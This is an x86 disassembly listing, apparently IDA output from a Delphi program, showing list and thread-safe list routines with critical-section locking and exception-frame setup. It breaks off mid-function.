call sub_40003CD8
test bl, bl
jle short loc_400134A2
mov eax, ebp
call sub_40003F80
loc_400134A2: ; CODE XREF: sub_40013448+51�j
pop ebp
pop edi
pop esi
pop ebx
retn
sub_40013448 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_400134A8 proc near ; CODE XREF: sub_40013510+B�p
add eax, 8
push eax
call sub_40006520 ; RtlEnterCriticalSection
retn
sub_400134A8 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_400134B4 proc near ; CODE XREF: sub_40013510+3C�p
add eax, 8
push eax
call sub_400065E8 ; RtlLeaveCriticalSection
retn
sub_400134B4 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_400134C0 proc near ; CODE XREF: sub_40013510+25�p
push ebx
push esi
push edi
push ebp
mov ebp, edx
mov edi, eax
mov eax, [edi+4]
mov ebx, [eax+8]
dec ebx
cmp ebx, 0
jl short loc_40013509
loc_400134D4: ; CODE XREF: sub_400134C0+47�j
mov eax, [edi+4]
mov edx, ebx
call sub_400137FC
mov esi, eax
mov edx, ebp
mov eax, esi
call sub_40013328
mov eax, [esi+0Ch]
cmp dword ptr [eax+8], 0
jnz short loc_40013503
mov eax, esi
call sub_40003CE8
mov eax, [edi+4]
mov edx, ebx
call sub_40013708
loc_40013503: ; CODE XREF: sub_400134C0+30�j
dec ebx
cmp ebx, 0FFFFFFFFh
jnz short loc_400134D4
loc_40013509: ; CODE XREF: sub_400134C0+12�j
pop ebp
pop edi
pop esi
pop ebx
retn
sub_400134C0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40013510 proc near ; CODE XREF: sub_40013ECC�p
; sub_40013ED4+1E�p
push ebp
mov ebp, esp
push ebx
mov ebx, eax
mov eax, ds:dword_4001F2D8
call sub_400134A8
xor eax, eax
push ebp
push offset loc_40013552
push dword ptr fs:[eax]
mov fs:[eax], esp
mov edx, ebx
mov eax, ds:dword_4001F2D8
call sub_400134C0
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_40013559
loc_40013547: ; CODE XREF: sub_40013510+47�j
mov eax, ds:dword_4001F2D8
call sub_400134B4
retn
; ---------------------------------------------------------------------------
loc_40013552: ; DATA XREF: sub_40013510+13�o
jmp loc_40004204
; ---------------------------------------------------------------------------
jmp short loc_40013547
; ---------------------------------------------------------------------------
loc_40013559: ; CODE XREF: sub_40013510+41�j
; DATA XREF: sub_40013510+32�o
pop ebx
pop ebp
retn
sub_40013510 endp
; ---------------------------------------------------------------------------
off_4001355C dd offset dword_400135A8 ; DATA XREF: sub_400135EC+F�r
dd 7 dup(0)
dd offset dword_400135A8
dd 10h
dd offset off_4000101C
dd offset sub_40003EF4
dd offset nullsub_2
dd offset nullsub_3
dd offset sub_40003F08
dd offset nullsub_4
dd offset sub_40003C80
dd offset sub_40003C9C
dd offset sub_40003CD8
dword_400135A8 dd 6E495409h, 6E6F4374h, 0C08B7473h ; .text:4001357C�o
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_400135B4 proc near ; CODE XREF: sub_400135EC+14�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
test dl, dl
jz short loc_400135C3
add esp, 0FFFFFFF0h
call sub_40003F30
loc_400135C3: ; CODE XREF: sub_400135B4+5�j
mov [eax+4], ecx
mov ecx, [ebp+arg_4]
mov [eax+8], ecx
mov ecx, [ebp+arg_0]
mov [eax+0Ch], ecx
test dl, dl
jz short loc_400135E5
call sub_40003F88
pop large dword ptr fs:0
add esp, 0Ch
loc_400135E5: ; CODE XREF: sub_400135B4+20�j
pop ebp
retn 8
sub_400135B4 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_400135EC proc near ; CODE XREF: .itext:4001937D�p
; .itext:40019391�p
push ebx
push esi
push edi
mov edi, ecx
mov esi, edx
mov ebx, eax
push esi
push edi
mov ecx, ebx
mov dl, 1
mov eax, ds:off_4001355C
call sub_400135B4
mov edx, eax
mov eax, ds:dword_4001F2D4
call sub_40013A1C
pop edi
pop esi
pop ebx
retn
sub_400135EC endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40013618 proc near ; CODE XREF: sub_40014D7C+7�p
; .text:40014F57�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
mov [ebp+var_4], edx
mov edi, eax
mov esi, [ebp+arg_0]
test esi, esi
jl short loc_4001364E
inc esi
lea ebx, [ecx+4]
loc_4001362F: ; CODE XREF: sub_40013618+34�j
mov edx, edi
mov eax, [ebx]
call sub_40007B90
test al, al
jz short loc_40013648
mov al, 1
mov edx, [ebp+var_4]
mov ecx, [ebx-4]
mov [edx], ecx
jmp short loc_40013650
; ---------------------------------------------------------------------------
loc_40013648: ; CODE XREF: sub_40013618+22�j
add ebx, 8
dec esi
jnz short loc_4001362F
loc_4001364E: ; CODE XREF: sub_40013618+11�j
xor eax, eax
loc_40013650: ; CODE XREF: sub_40013618+2E�j
pop edi
pop esi
pop ebx
pop ecx
pop ebp
retn 4
sub_40013618 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40013658 proc near ; CODE XREF: sub_40014D6C+7�p
; .text:40014F47�p
var_5 = byte ptr -5
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
add esp, 0FFFFFFF8h
push ebx
push esi
push edi
mov [ebp+var_4], ecx
mov edi, edx
mov esi, [ebp+arg_0]
test esi, esi
jl short loc_4001368B
inc esi
mov ebx, [ebp+var_4]
loc_40013671: ; CODE XREF: sub_40013658+31�j
cmp eax, [ebx]
jnz short loc_40013685
mov [ebp+var_5], 1
mov eax, edi
mov edx, [ebx+4]
call sub_400048D8
jmp short loc_4001368F
; ---------------------------------------------------------------------------
loc_40013685: ; CODE XREF: sub_40013658+1B�j
add ebx, 8
dec esi
jnz short loc_40013671
loc_4001368B: ; CODE XREF: sub_40013658+13�j
mov [ebp+var_5], 0
loc_4001368F: ; CODE XREF: sub_40013658+2B�j
movzx eax, [ebp+var_5]
pop edi
pop esi
pop ebx
pop ecx
pop ecx
pop ebp
retn 4
sub_40013658 endp
; =============== S U B R O U T I N E =======================================
sub_4001369C proc near ; DATA XREF: .text:40013088�o
push ebx
push esi
call sub_40003FD8
mov ebx, edx
mov esi, eax
mov eax, esi
mov edx, [eax]
call dword ptr [edx+8]
test bl, bl
jle short loc_400136B9
mov eax, esi
call sub_40003F80
loc_400136B9: ; CODE XREF: sub_4001369C+14�j
pop esi
pop ebx
retn
sub_4001369C endp
; =============== S U B R O U T I N E =======================================
sub_400136BC proc near ; CODE XREF: sub_4001326C+38�p
; sub_400133D4+4D�p ...
push ebx
push esi
push edi
mov edi, edx
mov ebx, eax
mov esi, [ebx+8]
cmp esi, [ebx+0Ch]
jnz short loc_400136D1
mov eax, ebx
mov edx, [eax]
call dword ptr [edx]
loc_400136D1: ; CODE XREF: sub_400136BC+D�j
mov eax, [ebx+4]
mov [eax+esi*4], edi
inc dword ptr [ebx+8]
test edi, edi
jz short loc_400136E9
xor ecx, ecx
mov edx, edi
mov eax, ebx
mov ebx, [eax]
call dword ptr [ebx+4]
loc_400136E9: ; CODE XREF: sub_400136BC+20�j
mov eax, esi
pop edi
pop esi
pop ebx
retn
sub_400136BC endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_400136F0 proc near ; DATA XREF: .text:40013094�o
push ebx
mov ebx, eax
xor edx, edx
mov eax, ebx
call sub_400138D4
xor edx, edx
mov eax, ebx
call sub_40013898
pop ebx
retn
sub_400136F0 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40013708 proc near ; CODE XREF: sub_40013328+2D�p
; sub_40013328+62�p ...
push ebx
push esi
push edi
mov esi, edx
mov ebx, eax
test esi, esi
jl short loc_40013718
cmp esi, [ebx+8]
jl short loc_40013727
loc_40013718: ; CODE XREF: sub_40013708+9�j
mov edx, off_4001B05C
mov ecx, esi
mov eax, [ebx]
call sub_400137A8
loc_40013727: ; CODE XREF: sub_40013708+E�j
mov edx, esi
mov eax, ebx
call sub_400137FC
mov edi, eax
dec dword ptr [ebx+8]
mov eax, [ebx+8]
cmp esi, eax
jge short loc_40013756
sub eax, esi
mov ecx, eax
add ecx, ecx
add ecx, ecx
mov eax, [ebx+4]
lea edx, [eax+esi*4]
mov eax, [ebx+4]
lea eax, [eax+esi*4+4]
call sub_40002DFC
loc_40013756: ; CODE XREF: sub_40013708+32�j
test edi, edi
jz short loc_40013765
mov cl, 2
mov edx, edi
mov eax, ebx
mov ebx, [eax]
call dword ptr [ebx+4]
loc_40013765: ; CODE XREF: sub_40013708+50�j
pop edi
pop esi
pop ebx
retn
sub_40013708 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4001376C proc near ; CODE XREF: sub_40013770+9�p
mov eax, [ebp+4]
retn
sub_4001376C endp
; =============== S U B R O U T I N E =======================================
sub_40013770 proc near ; CODE XREF: sub_400137A8+2D�p
; DATA XREF: .text:40013098�o
var_10 = dword ptr -10h
var_C = byte ptr -0Ch
push ebx
push esi
add esp, 0FFFFFFF8h
mov esi, ecx
mov ebx, edx
call sub_4001376C
push eax
mov [esp+14h+var_10], esi
mov [esp+14h+var_C], 0
lea eax, [esp+14h+var_10]
push eax
push 0
mov ecx, ebx
mov dl, 1
mov eax, ds:off_40012F88
call sub_4000B06C
jmp sub_400042E4
sub_40013770 endp
; ---------------------------------------------------------------------------
pop ecx
pop edx
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_400137A8 proc near ; CODE XREF: sub_40013708+1A�p
; sub_400137FC+19�p ...
var_4 = dword ptr -4
push ebp
mov ebp, esp
push 0
push ebx
push esi
mov esi, ecx
mov ebx, edx
xor eax, eax
push ebp
push offset loc_400137F0
push dword ptr fs:[eax]
mov fs:[eax], esp
lea edx, [ebp+var_4]
mov eax, ebx
call sub_400062F0
mov edx, [ebp+var_4]
mov ecx, esi
mov eax, ds:off_40013040
call sub_40013770
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_400137F7
loc_400137E7: ; CODE XREF: sub_400137A8+4D�j
lea eax, [ebp+var_4]
call sub_40004884
retn
; ---------------------------------------------------------------------------
loc_400137F0: ; DATA XREF: sub_400137A8+E�o
jmp loc_40004204
; ---------------------------------------------------------------------------
jmp short loc_400137E7
; ---------------------------------------------------------------------------
loc_400137F7: ; CODE XREF: sub_400137A8+47�j
; DATA XREF: sub_400137A8+3A�o
pop esi
pop ebx
pop ecx
pop ebp
retn
sub_400137A8 endp
; =============== S U B R O U T I N E =======================================
sub_400137FC proc near ; CODE XREF: sub_40013328+18�p
; sub_40013328+4D�p ...
push ebx
push esi
mov esi, edx
mov ebx, eax
test esi, esi
jl short loc_4001380B
cmp esi, [ebx+8]
jl short loc_4001381A
loc_4001380B: ; CODE XREF: sub_400137FC+8�j
mov edx, off_4001B05C
mov ecx, esi
mov eax, [ebx]
call sub_400137A8
loc_4001381A: ; CODE XREF: sub_400137FC+D�j
mov eax, [ebx+4]
mov eax, [eax+esi*4]
pop esi
pop ebx
retn
sub_400137FC endp
; ---------------------------------------------------------------------------
align 4
loc_40013824: ; DATA XREF: .text:off_4001308C�o
mov edx, [eax+0Ch]
cmp edx, 40h
jle short loc_4001383A
mov ecx, edx
test ecx, ecx
jns short loc_40013835
add ecx, 3
loc_40013835: ; CODE XREF: .text:40013830�j
sar ecx, 2
jmp short loc_4001384B
; ---------------------------------------------------------------------------
loc_4001383A: ; CODE XREF: .text:4001382A�j
cmp edx, 8
jle short loc_40013846
mov ecx, 10h
jmp short loc_4001384B
; ---------------------------------------------------------------------------
loc_40013846: ; CODE XREF: .text:4001383D�j
mov ecx, 4
loc_4001384B: ; CODE XREF: .text:40013838�j
; .text:40013844�j
add ecx, edx
mov edx, ecx
call sub_40013898
retn
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40013858 proc near ; CODE XREF: sub_40013878+6�p
; sub_40013A1C+31�p
push ebx
xor ecx, ecx
jmp short loc_4001385E
; ---------------------------------------------------------------------------
loc_4001385D: ; CODE XREF: sub_40013858+11�j
inc ecx
loc_4001385E: ; CODE XREF: sub_40013858+3�j
cmp ecx, [eax+8]
jge short loc_4001386B
mov ebx, [eax+4]
cmp edx, [ebx+ecx*4]
jnz short loc_4001385D
loc_4001386B: ; CODE XREF: sub_40013858+9�j
cmp ecx, [eax+8]
jnz short loc_40013873
or ecx, 0FFFFFFFFh
loc_40013873: ; CODE XREF: sub_40013858+16�j
mov eax, ecx
pop ebx
retn
sub_40013858 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40013878 proc near ; CODE XREF: sub_40013AB8+28�p
push ebx
push esi
mov ebx, eax
mov eax, ebx
call sub_40013858
mov esi, eax
test esi, esi
jl short loc_40013892
mov edx, esi
mov eax, ebx
call sub_40013708
loc_40013892: ; CODE XREF: sub_40013878+F�j
mov eax, esi
pop esi
pop ebx
retn
sub_40013878 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40013898 proc near ; CODE XREF: sub_400136F0+10�p
; .text:4001384F�p ...
push ebx
push esi
mov esi, edx
mov ebx, eax
cmp esi, [ebx+8]
jl short loc_400138AB
cmp esi, 7FFFFFFh
jle short loc_400138BA
loc_400138AB: ; CODE XREF: sub_40013898+9�j
mov edx, off_4001AFE4
mov ecx, esi
mov eax, [ebx]
call sub_400137A8
loc_400138BA: ; CODE XREF: sub_40013898+11�j
cmp esi, [ebx+0Ch]
jz short loc_400138D0
mov edx, esi
add edx, edx
add edx, edx
lea eax, [ebx+4]
call sub_40002C54
mov [ebx+0Ch], esi
loc_400138D0: ; CODE XREF: sub_40013898+25�j
pop esi
pop ebx
retn
sub_40013898 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_400138D4 proc near ; CODE XREF: sub_400136F0+7�p
push ebx
push esi
push edi
push ebp
mov esi, edx
mov ebx, eax
test esi, esi
jl short loc_400138E8
cmp esi, 7FFFFFFh
jle short loc_400138F7
loc_400138E8: ; CODE XREF: sub_400138D4+A�j
mov edx, off_4001AFA0
mov ecx, esi
mov eax, [ebx]
call sub_400137A8
loc_400138F7: ; CODE XREF: sub_400138D4+12�j
cmp esi, [ebx+0Ch]
jle short loc_40013905
mov edx, esi
mov eax, ebx
call sub_40013898
loc_40013905: ; CODE XREF: sub_400138D4+26�j
mov eax, [ebx+8]
cmp esi, eax
jle short loc_40013926
mov edx, [ebx+4]
lea edx, [edx+eax*4]
mov ecx, esi
sub ecx, eax
mov eax, ecx
add eax, eax
add eax, eax
xor ecx, ecx
xchg eax, edx
call sub_40003580
jmp short loc_4001393D
; ---------------------------------------------------------------------------
loc_40013926: ; CODE XREF: sub_400138D4+36�j
mov ebp, eax
dec ebp
mov edi, esi
sub edi, ebp
jg short loc_4001393D
dec edi
loc_40013930: ; CODE XREF: sub_400138D4+67�j
mov edx, ebp
mov eax, ebx
call sub_40013708
dec ebp
inc edi
jnz short loc_40013930
loc_4001393D: ; CODE XREF: sub_400138D4+50�j
; sub_400138D4+59�j
mov [ebx+8], esi
pop ebp
pop edi
pop esi
pop ebx
retn
sub_400138D4 endp
; ---------------------------------------------------------------------------
align 4
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_5. PRESS KEYPAD "+" TO EXPAND]
align 4
; =============== S U B R O U T I N E =======================================
sub_4001394C proc near ; CODE XREF: sub_400191F8+60�p
; sub_400191F8+71�p ...
push ebx
push esi
test dl, dl
jz short loc_4001395A
add esp, 0FFFFFFF0h
call sub_40003F30
loc_4001395A: ; CODE XREF: sub_4001394C+4�j
mov ebx, edx
mov esi, eax
xor edx, edx
mov eax, esi
call sub_40003CB8
lea eax, [esi+8]
push eax
call sub_400065E0 ; InitializeCriticalSection
mov dl, 1
mov eax, ds:off_40013040
call sub_40003CB8
mov [esi+4], eax
mov byte ptr [esi+20h], 0
mov eax, esi
test bl, bl
jz short loc_40013998
call sub_40003F88
pop large dword ptr fs:0
add esp, 0Ch
loc_40013998: ; CODE XREF: sub_4001394C+3B�j
mov eax, esi
pop esi
pop ebx
retn
sub_4001394C endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_400139A0 proc near ; DATA XREF: .text:400130EC�o
var_5 = byte ptr -5
var_4 = dword ptr -4
push ebp
mov ebp, esp
add esp, 0FFFFFFF8h
call sub_40003FD8
mov [ebp+var_5], dl
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
call sub_40013AA4
xor eax, eax
push ebp
push offset loc_40013A03
push dword ptr fs:[eax]
mov fs:[eax], esp
mov eax, [ebp+var_4]
mov eax, [eax+4]
call sub_40003CE8
movzx edx, [ebp+var_5]
and dl, 0FCh
mov eax, [ebp+var_4]
call sub_40003CD8
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_40013A0A
loc_400139EE: ; CODE XREF: sub_400139A0+68�j
mov eax, [ebp+var_4]
call sub_40013B08
mov eax, [ebp+var_4]
add eax, 8
push eax
call sub_40006518 ; RtlDeleteCriticalSection
retn
; ---------------------------------------------------------------------------
loc_40013A03: ; DATA XREF: sub_400139A0+1C�o
jmp loc_40004204
; ---------------------------------------------------------------------------
jmp short loc_400139EE
; ---------------------------------------------------------------------------
loc_40013A0A: ; DATA XREF: sub_400139A0+49�o
cmp [ebp+var_5], 0
jle short loc_40013A18
mov eax, [ebp+var_4]
call sub_40003F80
loc_40013A18: ; CODE XREF: sub_400139A0+6E�j
pop ecx
pop ecx
pop ebp
retn
sub_400139A0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40013A1C proc near ; CODE XREF: sub_400135EC+20�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ebx
mov ebx, edx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
call sub_40013AA4
xor eax, eax
push ebp
push offset loc_40013A98
push dword ptr fs:[eax]
mov fs:[eax], esp
mov eax, [ebp+var_4]
cmp byte ptr [eax+20h], 1
jz short loc_40013A55
mov eax, [ebp+var_4]
mov eax, [eax+4]
mov edx, ebx
call sub_40013858
inc eax
jnz short loc_40013A64
loc_40013A55: ; CODE XREF: sub_40013A1C+27�j
mov eax, [ebp+var_4]
mov eax, [eax+4]
mov edx, ebx
call sub_400136BC
jmp short loc_40013A82
; ---------------------------------------------------------------------------
loc_40013A64: ; CODE XREF: sub_40013A1C+37�j
mov eax, [ebp+var_4]
cmp byte ptr [eax+20h], 2
jnz short loc_40013A82
mov edx, off_4001AF90
mov eax, [ebp+var_4]
mov eax, [eax+4]
mov eax, [eax]
mov ecx, ebx
call sub_400137A8
loc_40013A82: ; CODE XREF: sub_40013A1C+46�j
; sub_40013A1C+4F�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_40013A9F
loc_40013A8F: ; CODE XREF: sub_40013A1C+81�j
mov eax, [ebp+var_4]
call sub_40013B08
retn
; ---------------------------------------------------------------------------
loc_40013A98: ; DATA XREF: sub_40013A1C+15�o
jmp loc_40004204
; ---------------------------------------------------------------------------
jmp short loc_40013A8F
; ---------------------------------------------------------------------------
loc_40013A9F: ; CODE XREF: sub_40013A1C+7B�j
; DATA XREF: sub_40013A1C+6E�o
pop ebx
pop ecx
pop ebp
retn
sub_40013A1C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40013AA4 proc near ; CODE XREF: sub_400139A0+14�p
; sub_40013A1C+D�p ...
push ebx
mov ebx, eax
lea eax, [ebx+8]
push eax
call sub_40006520 ; RtlEnterCriticalSection
mov eax, [ebx+4]
pop ebx
retn
sub_40013AA4 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40013AB8 proc near ; CODE XREF: sub_40015840+79�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ebx
mov ebx, edx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
call sub_40013AA4
xor eax, eax
push ebp
push offset loc_40013AFB
push dword ptr fs:[eax]
mov fs:[eax], esp
mov eax, [ebp+var_4]
mov eax, [eax+4]
mov edx, ebx
call sub_40013878
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_40013B02
loc_40013AF2: ; CODE XREF: sub_40013AB8+48�j
mov eax, [ebp+var_4]
call sub_40013B08
retn
; ---------------------------------------------------------------------------
loc_40013AFB: ; DATA XREF: sub_40013AB8+15�o
jmp loc_40004204
; ---------------------------------------------------------------------------
jmp short loc_40013AF2
; ---------------------------------------------------------------------------
loc_40013B02: ; CODE XREF: sub_40013AB8+42�j
; DATA XREF: sub_40013AB8+35�o
pop ebx
pop ecx
pop ebp
retn
sub_40013AB8 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40013B08 proc near ; CODE XREF: sub_400139A0+51�p
; sub_40013A1C+76�p ...
add eax, 8
push eax
call sub_400065E8 ; RtlLeaveCriticalSection
retn
sub_40013B08 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40013B14 proc near ; DATA XREF: .text:40013144�o
push ebx
push esi
call sub_40003FD8
mov ebx, edx
mov esi, eax
mov eax, esi
call sub_40013D90
mov edx, ebx
and dl, 0FCh
mov eax, esi
call sub_40003CD8
test bl, bl
jle short loc_40013B3D
mov eax, esi
call sub_40003F80
loc_40013B3D: ; CODE XREF: sub_40013B14+20�j
pop esi
pop ebx
retn
sub_40013B14 endp
; =============== S U B R O U T I N E =======================================
sub_40013B40 proc near ; DATA XREF: .text:40013150�o
test edx, edx
jz short loc_40013B4A
xchg eax, edx
mov ecx, [eax]
call dword ptr [ecx]
retn
; ---------------------------------------------------------------------------
loc_40013B4A: ; CODE XREF: sub_40013B40+2�j
xor edx, edx
call sub_40013B54
retn
sub_40013B40 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40013B54 proc near ; CODE XREF: sub_40013B40+C�p
; .text:40013C25�p
var_114 = dword ptr -114h
var_110 = byte ptr -110h
var_10C = dword ptr -10Ch
var_108 = byte ptr -108h
var_104 = byte ptr -104h
var_4 = dword ptr -4
push ebp
mov ebp, esp
add esp, 0FFFFFEECh
push ebx
push esi
xor ecx, ecx
mov [ebp+var_4], ecx
mov esi, edx
mov ebx, eax
xor eax, eax
push ebp
push offset loc_40013C0A
push dword ptr fs:[eax]
mov fs:[eax], esp
test esi, esi
jz short loc_40013B97
lea edx, [ebp+var_104]
mov eax, [esi]
call sub_40003C6C
lea edx, [ebp+var_104]
lea eax, [ebp+var_4]
call sub_40004AE8
jmp short loc_40013BA4
; ---------------------------------------------------------------------------
loc_40013B97: ; CODE XREF: sub_40013B54+24�j
lea eax, [ebp+var_4]
mov edx, offset dword_40013C20
call sub_4000491C
loc_40013BA4: ; CODE XREF: sub_40013B54+41�j
mov eax, [ebp+var_4]
mov [ebp+var_114], eax
mov [ebp+var_110], 0Bh
lea edx, [ebp+var_104]
mov eax, [ebx]
call sub_40003C6C
lea eax, [ebp+var_104]
mov [ebp+var_10C], eax
mov [ebp+var_108], 4
lea eax, [ebp+var_114]
push eax
push 1
mov ecx, off_4001AFAC
mov dl, 1
mov eax, ds:off_400073E4
call sub_4000B128
call sub_400042E4
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_40013C11
loc_40013C01: ; CODE XREF: sub_40013B54+BB�j
lea eax, [ebp+var_4]
call sub_40004884
retn
; ---------------------------------------------------------------------------
loc_40013C0A: ; DATA XREF: sub_40013B54+17�o
jmp loc_40004204
; ---------------------------------------------------------------------------
jmp short loc_40013C01
; ---------------------------------------------------------------------------
loc_40013C11: ; CODE XREF: sub_40013B54+B5�j
; DATA XREF: sub_40013B54+A8�o
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_40013B54 endp
; ---------------------------------------------------------------------------
align 4
dd 0FFFFFFFFh, 3
dword_40013C20 dd 6C696Eh ; ---------------------------------------------------------------------------
loc_40013C24: ; DATA XREF: .text:off_40013148�o
xchg eax, edx
call sub_40013B54
retn
; ---------------------------------------------------------------------------
align 4
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_6. PRESS KEYPAD "+" TO EXPAND]
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40013C30 proc near ; DATA XREF: .text:4001315E�o
var_104 = byte ptr -104h
var_4 = dword ptr -4
push ebp
mov ebp, esp
add esp, 0FFFFFEFCh
push ebx
push esi
push edi
xor ecx, ecx
mov [ebp+var_4], ecx
mov edi, edx
mov ebx, eax
xor eax, eax
push ebp
push offset loc_40013CC5
push dword ptr fs:[eax]
mov fs:[eax], esp
lea edx, [ebp+var_104]
mov eax, [ebx]
call sub_40003C6C
lea edx, [ebp+var_104]
mov eax, edi
call sub_40004AE8
mov eax, ebx
mov si, 0FFFFh
call sub_40003EC8
test eax, eax
jz short loc_40013CAF
mov eax, ebx
mov si, 0FFFFh
call sub_40003EC8
lea edx, [ebp+var_4]
mov si, 0FFFEh
call sub_40003EC8
cmp [ebp+var_4], 0
jz short loc_40013CAF
push [ebp+var_4]
push offset dword_40013CDC
push dword ptr [edi]
mov eax, edi
mov edx, 3
call sub_40004C08
loc_40013CAF: ; CODE XREF: sub_40013C30+4A�j
; sub_40013C30+67�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_40013CCC
loc_40013CBC: ; CODE XREF: sub_40013C30+9A�j
lea eax, [ebp+var_4]
call sub_40004884
retn
; ---------------------------------------------------------------------------
loc_40013CC5: ; DATA XREF: sub_40013C30+18�o
jmp loc_40004204
; ---------------------------------------------------------------------------
jmp short loc_40013CBC
; ---------------------------------------------------------------------------
loc_40013CCC: ; CODE XREF: sub_40013C30+94�j
; DATA XREF: sub_40013C30+87�o
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_40013C30 endp
; ---------------------------------------------------------------------------
align 4
dd 0FFFFFFFFh, 1
dword_40013CDC dd 2Eh ; ---------------------------------------------------------------------------
loc_40013CE0: ; DATA XREF: .text:4001315A�o
xor eax, eax
retn
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40013CE4 proc near ; CODE XREF: sub_40013ED4+36�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
add esp, 0FFFFFFF8h
push ebx
push esi
push edi
mov [ebp+var_8], edx
mov [ebp+var_4], eax
cmp ds:dword_4001F2E0, 0
jz loc_40013D86
mov eax, ds:dword_4001F2E0
call sub_40013AA4
mov edi, eax
xor eax, eax
push ebp
push offset loc_40013D7F
push dword ptr fs:[eax]
mov fs:[eax], esp
mov ebx, [edi+8]
dec ebx
cmp ebx, 0
jl short loc_40013D67
loc_40013D23: ; CODE XREF: sub_40013CE4+81�j
mov edx, ebx
mov eax, edi
call sub_400137FC
mov esi, eax
cmp [ebp+var_4], 0
jz short loc_40013D3C
mov eax, [esi+8]
cmp eax, [ebp+var_4]
jnz short loc_40013D61
loc_40013D3C: ; CODE XREF: sub_40013CE4+4E�j
cmp [ebp+var_8], 0
jz short loc_40013D51
mov edx, [esi+10h]
mov eax, [ebp+var_8]
call sub_40007B90
test al, al
jz short loc_40013D61
loc_40013D51: ; CODE XREF: sub_40013CE4+5C�j
mov edx, ebx
mov eax, edi
call sub_40013708
mov eax, esi
call sub_40003CE8
loc_40013D61: ; CODE XREF: sub_40013CE4+56�j
; sub_40013CE4+6B�j
dec ebx
cmp ebx, 0FFFFFFFFh
jnz short loc_40013D23
loc_40013D67: ; CODE XREF: sub_40013CE4+3D�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_40013D86
loc_40013D74: ; CODE XREF: sub_40013CE4+A0�j
mov eax, ds:dword_4001F2E0
call sub_40013B08
retn
; ---------------------------------------------------------------------------
loc_40013D7F: ; DATA XREF: sub_40013CE4+2B�o
jmp loc_40004204
; ---------------------------------------------------------------------------
jmp short loc_40013D74
; ---------------------------------------------------------------------------
loc_40013D86: ; CODE XREF: sub_40013CE4+16�j
; sub_40013CE4+9A�j
; DATA XREF: ...
pop edi
pop esi
pop ebx
pop ecx
pop ecx
pop ebp
retn
sub_40013CE4 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40013D90 proc near ; CODE XREF: sub_40013B14+D�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
mov [ebp+var_4], eax
cmp ds:dword_4001F2E0, 0
jz short loc_40013E0E
mov eax, ds:dword_4001F2E0
call sub_40013AA4
mov edi, eax
xor eax, eax
push ebp
push offset loc_40013E07
push dword ptr fs:[eax]
mov fs:[eax], esp
mov ebx, [edi+8]
dec ebx
cmp ebx, 0
jl short loc_40013DEF
loc_40013DC6: ; CODE XREF: sub_40013D90+5D�j
mov edx, ebx
mov eax, edi
call sub_400137FC
mov esi, eax
mov eax, [esi+4]
cmp eax, [ebp+var_4]
jnz short loc_40013DE9
mov edx, ebx
